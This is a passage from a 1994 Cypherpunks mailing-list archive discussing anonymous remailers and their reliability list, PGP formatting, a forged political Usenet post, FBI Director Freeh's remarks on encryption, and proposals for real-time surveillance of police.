stronger standing on campus, their asking would be way cool. >I'm a fairly well-known regular in alt.config, and I believe I can probably >recruit some prominent news admins to send booster newgroup messages for >alt.anonymous.messages. Apart from that, it's a matter of people asking their >local news admins to pick up the group if they aren't already carrying it. That would be a most excellent thing to do, regardless of how it affects my situation. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuwLBSoZzwIn1bdtAQHxqgGA3WuDp+3/5A8pqGNpFc5UqAVJafaSL7je bUpZDrHpYMXycfCUPAgh+HpxJpCTLWU1 =c8Gt -----END PGP SIGNATURE----- From nobody at jpunix.com Mon Dec 12 01:08:10 1994 From: nobody at jpunix.com (Anonymous) Date: Mon, 12 Dec 94 01:08:10 PST Subject: Crypto Declaration of Independance Message-ID: <199412120906.DAA09468@jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- I have a proposal for you all. I have started work on a Crypto Declaration of Independence, based on the famous American work which represents Independence. With the incoming batch of Congress and the new year approaching, I think that it's time we assert what we believe in. We need to let people know what we stand for, and why we think it's a good idea. And with the (quasi)-recent passage of the DigiTel proposal and Freeh's comments about banning encryption, we need to wake people up. However, asserting this to ourselves again would be akin to holding a one-person conference. We have rehashed these points amongst ourselves many times. Therefore, I propose that we spend some time revising this work, based off the writing I will post if there is support for this idea, then sign it, and email, fax and mail it to our respective news agencies, government officials and interest groups. However, without your support, this endeavor would be fruitless. Before I post the "beta version"/first draft of the CDoI (for lack of a better term), I want to know if you (the C'punks) will support it and help me. Overall, I'm looking for answers to four questions: 1) Will you support and help this endeavor. 2) A target date for sending it out. First idea which came to mind: Jan 1st, 1995 3) A list of groups/people which should receive it. Government officials, news agencies, HOTtired, CPSR, EFF, ACLU, etc and along with #3: 4) Ways for bringing it to people's attention. I intend to keep myself anonymous during this process, so please contact me by leaving a message on this list, or mailing everything within these cutmarks to remailer at jpunix.com: -- CUTMARK ( do not include )-- :: Encrypted: PGP - -----BEGIN PGP MESSAGE----- Version: 2.6.2 hIwD/nqSW1QDQfUBA/wI+tSk7CWd5u2dMywjv6oLosg3nm5ki/p8HhOg7VXHDk0S 6MpptLzWzUtkvL+EZEBS7NHORSTNRbo0K/Uvqgl0Rqaqig5Wx6i2VKve3ky9/Kbm I72casRMcyoBka+cOtKdU5JBVXF/YDWmCb3usnvAu0oDZGxBstTaTPgpJzMiV6YA AACTszK/wRKedt58GVDLQs7gNNUUyIxbKtUQNQGss2sbM7AZE0kaQ7B6Z1VXJy0t NKYzUQfk5LEJ1ko9ZbvDSgAWzTnZbmyfSszrpHpRN7ehFhgRCVf4YToMQa5eSOAg CHxmBMq01kDqIntHXZpWquU31+rfpPNNAT9pFHiYAj7biIRA3LWIRwvmy30j+QEv DaMODrdo =xtpD - -----END PGP MESSAGE----- < please put your message to me here> -- CUTMARK ( do not include ) -- I hope you will support me, and I will welcome any and all comments and criticism. Asynchronous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuq6yFG1rORFKstdAQH54wP/SaiMFKwz2UzjMdnhVK1HiBW2qSNs6NWC 5ENgEHod+n4ngfsx+miYMzmzDq2GmJ/KbvfMQjDFZiIcsirT2JPcu/YuvLG9AJvy GbO4pY0n/Mky8m1V66OxTxnVjb5CaGpRvbxrOKzAMx7CQMBGRfbdlHpPjtLWfpLf l0xwy9yoCVU= =Loxi -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Dec 12 01:16:37 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 12 Dec 94 01:16:37 PST Subject: Globe and Mail Article On Forged Posting Message-ID: <199412120921.EAA15170@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Mark Terka writes: > Ok, here is the text of the story about the "Forged Bob Rae Posting" from > the Toronto Globe and Mail. An examination of the story only indicates how > far our journalists and politicians have to go in understanding the Internet! Indeed. Let's examine some of the apparent misconceptions.... [quoted text from here to the end is from Rusk & Mittelstaedt of the Globe & Mail] > A furious Mr. Rae criticized Mr. Harris outside the legislature, > accusing him of leading to the "Americanization of Canadian > politics" through the use of "dirty tricks. (ouch :) [...] > Ont.general is a computer bulletin board on which Internet users > discuss life and public issues in the province, said Larry Sherman, > president of Internet Seminars of Woodbridge. > A message can be removed from the board only by whoever posted it, No, anyone with a moderately flexible newsreader and a little bit of knowledge about news control message syntax can cancel someone else's article. Tying this in to the discussion about using a newsgroup as a message pool, notice that news articles are far easier to wipe out than mail messages. This is potentially a major vulnerability of any such system, given current news software. Widespread unauthorized cancellations (other than for spam) are greatly frowned upon, though, so a concerted attack would probably set up a major clash of powers on the net. [...] > The source of the message was an account that provides a service > that allows people anonymous access to the Internet, she said. mail forwarding =/= net access > Mr. Sherman said it is very easy to post a false message on a > bulletin board and to make it appear that it came from a computer > different from the one that sent it. True, but that's a claim about forgery, not remailing; this is a worrisome confusion of terms reminiscent of the hacker/cracker problem. > By going through a California bulletin board, "obviously someone > has gone way out of their way to send that in," Mr. Sherman > added. One hopes that Internet Seminars pres. Sherman isn't responsible for the absurd implication I infer from this: sending mail via a geographically distant site requires going out of one's way. Is there some more sensible interpretation ? It seems obvious that someone posting an article purporting to emanate from the Canadian PM would try to transmit it with some level of indirection. [...] > Last months, the Tories played pranks at an NDP convention > sending in a camera crew that shot pictures ridiculing Mr. Rae, > including a doctored video sequence that seemed to give the Premier > a stutter. The picture were broadcast as dinner-time entertainment > at a Conservative convention the same weekend. Who's learning slimy politics from whom ? - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuwUnmf7YYibNzjpAQHqQAP+LPVNyr0dFCMDlSmF9GiLzK6ODmCgpopC Pke/Qk9esB+vWA5bPpxtbD1Z61rCGJgvZU++g1+vovmbcSzduoQMauEKKoX5+V9m oGEcfyvu1KqnsVL83jN6YHTMANs/DxHCPVf8jWusJOgQJ+LzZN9xPxlcKDBRFiS1 wyBTHvaOlaQ= =Lism - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuwV9yoZzwIn1bdtAQHkUAF/QCXYBhzma2Y8rrT+hWnIeZYkjlNzi+8s Nf3pPrzjc34nCOsxcwz9aJ9AjhPvWJEV =wOms -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Dec 12 01:50:09 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 12 Dec 94 01:50:09 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <199412120955.EAA16263@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Todd Masco writes: > I don't see a problem. Broadly put, news is broadcast e-mail. There are > many sites which in fact do not distinguish between the two, the most > notable of which is CMU's Andrew Message System: the admins of such > systems believe the "experiment" to be an all-around success. Is the AMS software (or some similar system) available as freeware or shareware somewhere ? I'm considering the possibilities for anonymized subscription to newsgroups through a mechanism like this. Come to think of it, many newsgroups are gatewayed to related mailing lists for readers on BBSes and such; I need to search a bit for the software used to do this. I'm curious how such systems deal with cancellation messages; presumably they would simply have to drop them. This would partially eliminate the threat of spam-of-cancels attacks I mentioned earlier. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuwcj2f7YYibNzjpAQEFgAQA0NujNGNOBBLyhPvCL09CmGn1atDbckX+ 98e5iSm+BMJNeD++m55uLl+8jk5HugNmu4M3/cYDq3fwff6d2lLczBQlHTPRxz3E JGKrB8Ho0scxHbvv70UL2SYHR22JQJk/GQWmx91wwdWb27maTW2QWVRtraQzLBaR EJJzpj29Iyo= =mIVa - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuwdyioZzwIn1bdtAQEThAGAuTkPjJ+9wOwl5PnTJUnZ8BK1XDEcoKyY NR9OCOYqzWz3NWk944ypq4ZX1z8w5Eyw =0Fo0 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Dec 12 02:00:28 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 12 Dec 94 02:00:28 PST Subject: Broadcasts - Bandwidth Problem ? Message-ID: <199412121005.FAA16675@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Jonathan Rochkind writes: > Many people seemed to think that a newsgroup for this sort of a thing was a > waste of bandwith. I don't really agree, and think that the bandwith is > neccesary for a distributed method of making the remailer net more robust > to remailers popping into and out of existence. In case the bandwidth on {alt.anonymous, alt.anonymous.messages} started to bother news admins, we could actively encourage them to put the groups on very short expiration periods, i.e. articles might expire after only a day. Assuming people are using automated sniffers to collect their anonymous mail, this shouldn't present any obstacle to the use of the groups as message pools. Keeping the ciphertext around in public for a shorter time sounds like a Good Thing (tm), anyway. I agree that bandwidth seems essential to foiling traffic analysis. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuwe/Wf7YYibNzjpAQFK4AP/YFtRJMd0emeRJgZf4QaL4qPvMFKNn3Uv MYFhJ8GR2M4x1q/ZAwhJsP3NuIeRk5UAWc1Ti1OYKjDkNvoQ52DK3uOW6aCqxYp0 3REpK53F0PkuVL9EnfGImrUWAyeUr2oZOzp1O67hD0eCYhM4IdcdDudA/97Xh0R+ zRIhgC6/Gfo= =n6qM - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuwgPSoZzwIn1bdtAQFFgAF+LXvBnjZEZxsMx9MU+fGX9ynuAnrqKs6S EFbgsBG8aFvul2skOsgIBrVW5luJm4c7 =iPbm -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Dec 12 02:13:21 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 12 Dec 94 02:13:21 PST Subject: Exact quotation from Freeh on banning unapproved crypto ? Message-ID: <199412121018.FAA17062@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Can anyone point me to a source of verbatim quotations of Louis Freeh's now- legendary comments about the possibilities of banning unapproved cryptography ? All I have been able to find thus far are vague paraphrases. Thanks. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuwh+2f7YYibNzjpAQHp+wP9F2tGTtTYg+QRlDQVkrgfQh6YSbKRXNW1 OJX22BcuhAFsMX1LUTZQ5unYiwXi8pu9jdyeCV5nGU/PSKO3noSEunBFlSPCm0nm yW5UEiWGWjRuDUJNEEB81W9KVdB8JPvTgsBANv4skQpT8pNPumQz54uPvEaFJ8O3 bt+zxTB6dc8= =ATOv - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuwjSCoZzwIn1bdtAQFs5wF/c6t636S1GnUKygE2/UBJGwyoSnubAYJ6 5+Ck9KIrIavZ7n/7qLWhYX+7jp8Xkq54 =MM0m -----END PGP SIGNATURE----- From m5 at vail.tivoli.com Mon Dec 12 05:25:26 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Mon, 12 Dec 94 05:25:26 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: Message-ID: <9412121325.AA02896@vail.tivoli.com> Ian Farquhar writes: > Around the mid 1980's a rather interesting device appeared. It was > essentially an automated scanner for high-density barcodes. A recent mini-article in "WiReD" mentions a barcode-like encoding mechanism being promoted by (I think) Xerox. It's apparently denser than barcode and it survives copying well. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From raph at CS.Berkeley.EDU Mon Dec 12 06:50:03 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 12 Dec 94 06:50:03 PST Subject: List of reliable remailers Message-ID: <199412121450.GAA25593@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"myriad"} = " cpunk pgp hash latent cut ek"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 12 Dec 94 6:00:01 PST remailer email address history latency uptime ----------------------------------------------------------------------- xs4all remailer at xs4all.nl ***+*-+***** 9:24 99.99% usura usura at xs4all.nl ***-*-++**** 10:38 99.99% alumni hal at alumni.caltech.edu +*+**+**+*** 7:33 99.99% penet anon at anon.penet.fi ++**+******* 29:39 99.99% c2 remail at c2.org +++-_--+++-+ 58:05 99.99% flame tomaz at flame.sinet.org +*++******+- 14:55 99.98% nately remailer at nately.ucsd.edu ++++++++++++ 32:43 99.98% portal hfinney at shell.portal.com ************ 4:17 99.97% jpunix remailer at jpunix.com +*++***** +- 14:42 99.96% myriad remailer at myriad.pc.cc.cmu.edu **+********* 5:32 99.94% vox remail at vox.xs4all.nl ---------..- 14:16:12 99.99% rahul homer at rahul.net *********** 5:06 99.88% bsu-cs nowhere at bsu-cs.bsu.edu *+-***-**++ 22:31 99.82% mix mixmaster at nately.ucsd.edu -+-+-++**+++ 32:50 99.80% ideath remailer at ideath.goldenbear.com ******-*++ 29:24 99.82% desert remail at desert.xs4all.nl -------.--- 10:57:50 99.99% extropia remail at extropia.wimsey.com --+++---.-+ 5:00:06 99.68% rebma remailer at rebma.mn.org *-..-.-*--- 10:34:53 99.71% soda remailer at csua.berkeley.edu .-......_. 11:45:06 96.63% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From droelke at spirit.aud.alcatel.com Mon Dec 12 07:12:22 1994 From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke) Date: Mon, 12 Dec 94 07:12:22 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: <9412121512.AA02548@spirit.aud.alcatel.com> > > Ian Farquhar writes: > > Around the mid 1980's a rather interesting device appeared. It was > > essentially an automated scanner for high-density barcodes. > > A recent mini-article in "WiReD" mentions a barcode-like encoding > mechanism being promoted by (I think) Xerox. It's apparently denser > than barcode and it survives copying well. The Xerox technology is essentially a series of tiny slashes and backslashes. The slashes stand for a 1 and the backslashes a 0 - or vice-versa. This gives you a binary data stream that you can work with. From what I understand, without looking at them closely, the area with these slashes looks like a gray screen. When I first read about this technology a couple of months ago, it was given as a way that sufficiently smart color copiers could restore original color to a black and white copy. Of course there are all kinds of other applications.... ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX http://spirit.aud.alcatel.com:8081/~droelke/ From bugs at ritz.mordor.com Mon Dec 12 07:39:11 1994 From: bugs at ritz.mordor.com (Mark Hittinger) Date: Mon, 12 Dec 94 07:39:11 PST Subject: real time surveillances Message-ID: <199412121538.KAA10670@ritz.mordor.com> Some thoughts on this: Will the people *believe* the electronic position data? Nope. When you are busted not only will you be frisked but you will also be bulk erased :-) (to get TC's DAT tape!) The technology to fabricate video evidence is there is it not? There was a relatively recent sad case of two officers that had a video camera installed in their patrol car. They had pulled over a speeding car. While obtaining the license the occupants of the car murdered the policemen and the *entire* scene was obtained on video tape. When the tape was later reviewed, searching for a clue as to what happened, the individual had to watch the officers slowly die - all captured on video. It is possible that they might have been saved had this been real-time video rather than taped. Consider the next level here folks? Will just having archived knowledge of where certain people are be adequate? Will there not ultimately be a call for real time monitoring of these officers? Will that be something that would be cool with them? Another great idea would be anonymous real-time monitoring of vital signs along with position data. Auto-911 if you will. We know somebody at this corner had a heart attack 5 minutes ago where is he? Cheers mark.h From perry at imsi.com Mon Dec 12 07:51:20 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 07:51:20 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9412121550.AA10442@snark.imsi.com> Marc Andreessen says: > I fully expect we'll be supporting other security standards and > approaches as they emerge, and we certainly welcome realistic suggestions > on what we should do, when, and how. I told you in Email, Mr. Andreessen, that new transport level security protocols are useless now that IPSP has come near to standardization and now that prototype implementations are nearly available. Many people at IETF in other groups expressed far less interest in proceeding with new security protocols now that there will be a network layer security protocol. However, you did not appear to be remotely interested. I suppose that you considered the comment I made "unrealistic". Personally, I consider to be unrealistic the notion that the same group of programmers who a year or two ago thought that the way to remove files on a Unix system was to use system(3) to call rm via the shell will be standardizing security -- after all, they couldn't produce a secure piece of software to begin with. My current presumption is that since the same programmers who produce Mosaic produced Netscape that, although pretty looking on the outside, it is just as bad on the inside: like a beautful marble skyscraper that is held together on the inside with chewing gum, toothpicks and rusty bailing wire. I have discouraged clients from using Netscape in the absense of source because there is no way to look for the security holes that are surely lurking within it; unfortunately, the product is just too pretty looking. By all means, of course, work on any security system you like. The burden will be on you to convince people to use it. Perry From perry at imsi.com Mon Dec 12 08:55:12 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 08:55:12 PST Subject: Crypto Declaration of Independance In-Reply-To: <199412120906.DAA09468@jpunix.com> Message-ID: <9412121654.AA10520@snark.imsi.com> Anonymous says: > I have started work on a Crypto Declaration of Independence, based on the > famous American work which represents Independence. Yup, just what we need -- more foaming at the mouth. Anyone interested in doing real work is encouraged to read the current internet drafts concerning the security multiparts extension to MIME, the security extensions to the DNS, or the work on security headers for IPv6 and IPSP (the equivalent of the v6 work for v4). .pm From doumakes at netcom.com Mon Dec 12 10:21:56 1994 From: doumakes at netcom.com (Don Doumakes) Date: Mon, 12 Dec 94 10:21:56 PST Subject: Real-time surveillance of the police Message-ID: <199412121820.KAA08206@netcom11.netcom.com> The technology of monitoring location is interesting, of course, but why on earth would the police, who will not consent to civilian review, ever go along with something orders of magnitude more extreme? ObCrypto/Privacy: I suspect there would be an immense amount of radio traffic involved in keeping track of a substantial group of people, say, over 1000. I don't doubt the ability of the device(s) to transmit the information, but the ability of the receivers to digest it all in real time. -- ______________________________________________________________________ Don Doumakes Finger doumakes at netcom.com for PGP public key Foxpro databases built to your specifications. Email me for details. From steven at echonyc.com Mon Dec 12 10:23:34 1994 From: steven at echonyc.com (Steven Levy) Date: Mon, 12 Dec 94 10:23:34 PST Subject: Exact quotation from Freeh on banning unapproved crypto ? In-Reply-To: <199412121018.FAA17062@bb.hks.net> Message-ID: I was the one who asked Freeh the question, after he gave a talk at the conference on Global Cryptography. I said that while the administration is currently saying that they are not interested in regulating cryptography domestically, what if in the future the wiretaps you get yield scrambled messages that you can't decipher. (Meaning, do you regulate then?) Freeh asked, "In terms of encryption being a voluntary standard?" "Yes," I said. "Oh yeah, definitely," he said. "If five years from now we solved the access problem, but what we're hearing is all encrypted, I'll probably, if I'm still here, be talking about that in a very different way; the objective is the same. The objective is for us to get those conversations whether they're by an alligator clip or ones and zeros. Wherever they are, whatever they are, I need them." On Mon, 12 Dec 1994, L. McCarthy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > - -----BEGIN PGP SIGNED MESSAGE----- > > Can anyone point me to a source of verbatim quotations of Louis Freeh's now- > legendary comments about the possibilities of banning unapproved cryptography ? > All I have been able to find thus far are vague paraphrases. Thanks. > > - - -L. Futplex McCarthy > > - -----BEGIN PGP SIGNATURE----- > Version: 2.6.1 > > iQCVAwUBLuwh+2f7YYibNzjpAQHp+wP9F2tGTtTYg+QRlDQVkrgfQh6YSbKRXNW1 > OJX22BcuhAFsMX1LUTZQ5unYiwXi8pu9jdyeCV5nGU/PSKO3noSEunBFlSPCm0nm > yW5UEiWGWjRuDUJNEEB81W9KVdB8JPvTgsBANv4skQpT8pNPumQz54uPvEaFJ8O3 > bt+zxTB6dc8= > =ATOv > - -----END PGP SIGNATURE----- > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBLuwjSCoZzwIn1bdtAQFs5wF/c6t636S1GnUKygE2/UBJGwyoSnubAYJ6 > 5+Ck9KIrIavZ7n/7qLWhYX+7jp8Xkq54 > =MM0m > -----END PGP SIGNATURE----- > From sandfort at crl.com Mon Dec 12 10:32:01 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 10:32:01 PST Subject: BEAT COPS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Michael Crawford wrote: ... individual cops can rack up millions of dollars in legal settlement costs and still remain on the force. I heard ... that a small handfull of cops in San Francisco had cost the City tens of millions, with individual cops repeatedly causing lawsuits, without getting fired. True, but that's without embarrassing videotapes. The clueless populace doesn't stay clueless for long when they seen the police "blooper" tapes. Police unions won't have much clout compared to an enraged public. ... at least one cop wouldn't go for it - the cop we caught jacking off to a magazine of ill repute... Gives whole new meanings to "night stick," "the long arm of the law," "stop and frisk," "pat down," "pounding a beat" and going to the "policeman's ball." (Anyone else want to jump in on this one?) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jrochkin at cs.oberlin.edu Mon Dec 12 10:56:08 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 12 Dec 94 10:56:08 PST Subject: Misunderstanding of Remail Headers Message-ID: At 2:13 AM 12/12/94, L. McCarthy wrote: >Hal writes: >> There was also a misperception that my remailer was an official effort >> endorsed by Portal (again, despite the disclaimers). Note that it was >> they who were contacted, not me (yet). This might suggest that it will >> not be possible to cleanly separate the remailer operators and service >> providers when problems like this arise. Both may end up being hassled >> (time will tell whether I am). > >This is all too familiar to me. Although I still haven't heard the official >line on the shutdown of Underdog following the Scythe spam, at least some >people locally (including, crucially, my advisor) received the impression that >I had forged (and authored !) the offending news articles in spite of the >disclaimer headers. Maybe the remailers should put bogus "From:" lines in, to avoid this? Make it "From: nobody", or "From: Anonymous", or even something odd like "From: AnonUser!hfinney at shell.portal.com". Put in some other lines telling the actual address of the remailer, as well as a complaints-to: address. Maybe "Sender: hfinney at shell.portal.com", or "Remailer:hfinney at shell.portal.com". The "From:" line seems to be confusing people. The author of the article quoted from the Globe & Mail appearantly didn't even understand the disclaimer. The article was worded in such a way to make it seem the disclaimer was saying that Bob Rae didn't really write the message, as opposed to saying that Hal Finney didn't really write the message! Something needs to be done so that even the most internet clueless will understand that the message _isn't_ from Finney or McCarthy or Joe Random RemailerOp, which appearantly isn't clear to many people currently. From jrochkin at cs.oberlin.edu Mon Dec 12 11:02:04 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 12 Dec 94 11:02:04 PST Subject: extra dashes in PGP-related blocks? Message-ID: When people have been posting their public keys, or encrypted address blocks, to various lists I'm on, all of the "-----BEGIN whatever..." lines seem to have a "- " preppended to them. So, for instance, they look like: - -----BEGIN PGP MESSAGE----- Version: 2.6.2 [stuff] - -----END PGP MESSAGE----- I'm guessing if I really sent a block like that to a remailer, the remailer would hork because of the prepended "- "s. I know that sometimes people's public keys they've posted to a list look like that, and when I try to add them to PGP, it horks, and I've got to go into a text editor and remove the "- ", and then add it to my keyring. Does anyone know what it is that's putting in these "- "s, why it's putting them in, and how to stop it? From andrew_loewenstern at il.us.swissbank.com Mon Dec 12 11:31:54 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Mon, 12 Dec 94 11:31:54 PST Subject: extra dashes in PGP-related blocks? Message-ID: <9412121931.AA00608@ch1d157nwk> > I'm guessing if I really sent a block like that to a remailer, the > remailer would hork because of the prepended "- "s. I know that > sometimes people's public keys they've posted to a list look like > that, and when I try to add them to PGP, it horks, and I've got to > go into a text editor and remove the "- ", and then add it to my > keyring. PGP does this... Not only does it complicate nested PGP signed messages, but if you pgp-sign an entire MIME message (i.e. by sending it to the autosigning service) instead of placing the signed doc inside the MIME boundries, it can cause mail readers to not recognize the MIME boundries and display the letter as normal ASCII-Mail. andrew From andrew at riskdev.ml.com Mon Dec 12 11:33:12 1994 From: andrew at riskdev.ml.com (Andrew Brown) Date: Mon, 12 Dec 94 11:33:12 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: Message-ID: <9412121933.AA04137@nottingham.riskdev.ml.com> >> From: Jonathan Rochkind > >When people have been posting their public keys, or encrypted address >blocks, to various lists I'm on, all of the "-----BEGIN whatever..." lines >seem to have a "- " preppended to them. So, for instance, they look like: > >- -----BEGIN PGP MESSAGE----- >Version: 2.6.2 >[stuff] >- -----END PGP MESSAGE----- > >I'm guessing if I really sent a block like that to a remailer, the remailer >would hork because of the prepended "- "s. I know that sometimes people's >public keys they've posted to a list look like that, and when I try to add >them to PGP, it horks, and I've got to go into a text editor and remove the >"- ", and then add it to my keyring. > >Does anyone know what it is that's putting in these "- "s, why it's putting >them in, and how to stop it? pgp is putting those extra "- " pieces in (guess you didn't read all your pgp docs :-), it does that so that it can tell the difference between pgp begin/end blocks and other stuff, kinda like sendmail "quoting" lines beginning with a dot with an extra dot. the difference here is that sendmail removes any leading dots before delivery and pgp doesn't after removing a signature. yeah, you do have to load it into an editor but mailing something to a remailer shoud not "hork" it. the pgp running on the remailer will just "- " the stuff and include it literally. follow? -- --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown) Phone: 1.212.449.0088 Fax: 1.212.449.8612 From sandfort at crl.com Mon Dec 12 11:35:27 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 11:35:27 PST Subject: real time surveillances Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Mark Hittinger had several thoughts about real-time surveillance. He wrote: ... The technology to fabricate video evidence is there is it not? Big problem with self-surveillance; not a problem with a properly set up system of police surveillance. The critical element is a trusted third-party agency to archive the tapes. There was a relatively recent sad case of two officers that had a video camera installed in their patrol car.... the occupants of the car murdered the policemen and the *entire* scene was obtained on video tape.... It is possible that they might have been saved had this been real-time video rather than taped. Yes, and real-time video monitoring would be a good upgrade 